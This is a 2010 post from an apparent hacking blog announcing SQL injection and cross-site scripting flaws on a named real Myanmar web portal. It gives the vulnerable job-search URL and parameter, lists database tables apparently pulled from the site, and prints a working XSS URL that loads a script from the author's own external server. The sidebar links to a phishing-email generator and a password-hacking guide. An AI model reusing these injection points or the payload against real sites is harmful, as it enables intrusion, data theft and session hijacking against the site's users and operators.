Critical SQL Injection in Yatanarpon Web Portal

Home / Hacking, News, Security / Critical SQL Injection in Yatanarpon Web Portal

October 9, 2010 PlanetCreator 0 Comments 0 tags

PlanetCreator reported another critical SQL injection (vulnerability) on several sites of Yatanarpon Web Portal URL : http://www.yatanarpon.com.mm/

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.

informed to :- webmaster

SQL

http://job.yatanarpon.com.mm/new_searchresult.php?left_cat=1 and some links are vul…..

Table Name

user_testimonials
testimonials
tbl_send_content
subrecruiter
state
selectstyle
resume_product_posting
resume_product_access
resume_featured_employer
resume_club_pack
resume_builder_employment
resume_builder
realstyles
quote_recruiter_posting
quote_recruiter_featured
quote_recruiter_access
quote_recruiter
premium_employer_pricelist
premium_employer_logo
post_graduation
job_user
job_staticpages
job_sponsor
job_seeker_sub_farea
job_seeker_recruiter_jobs
job_seeker_itype
job_seeker_farea
job_seeker
job_saved_jobs
job_recruiter_type
job_recruiter_itype
job_recruiter_country
job_recruiter
job_keyword2
job_keyword
job_jobs
job_feed1
job_feed
job_agent
job_admin
industry
homepageads
home_table
graduation
generalsettings
functional_area
featured_job
featured_employer_pricelist
featured_employer_logo
featured_employer_example
featured_employer
emp_login
doctrate
cv_seeker
coverletter
country
contact
cities
canada_region
canada_cities
blogs
banneradv

XSS

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users.

http://smallbusiness.yatanarpon.com.mm/step2.php?dns="><script src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js></script>>

There’s no input filtering…

If you want to see detail of this vulnerability Click Here (Note :- Registered Member Only- If you are not PlanetCreator.Net Member Sign up Here)

We hope that your security staff will look into this issue and fix it as soon as possible.

[webapps] Flowise 3.0.4 - Remote Code Execution (RCE)
on October 31, 2025 at 12:00 am
Flowise 3.0.4 - Remote Code Execution (RCE)
[webapps] Casdoor 2.95.0 - Cross-Site Request Forgery (CSRF)
on October 29, 2025 at 12:00 am
Casdoor 2.95.0 - Cross-Site Request Forgery (CSRF)
[local] Mbed TLS 3.6.4 - Use-After-Free
on September 16, 2025 at 12:00 am
Mbed TLS 3.6.4 - Use-After-Free
[webapps] Concrete CMS 9.4.3 - Stored XSS
on September 16, 2025 at 12:00 am
Concrete CMS 9.4.3 - Stored XSS
[webapps] XWiki Platform 15.10.10 - Metasploit Module for Remote Code Execution (RCE)
on September 16, 2025 at 12:00 am
XWiki Platform 15.10.10 - Metasploit Module for Remote Code Execution (RCE)

Critical SQL Injection in Yatanarpon Web Portal

Explore More

Introducing SpearPhisher – A Simple Phishing Email Generation Tool

How to Hack Windows XP Computer Passwords

10 steps you can take to improve your online security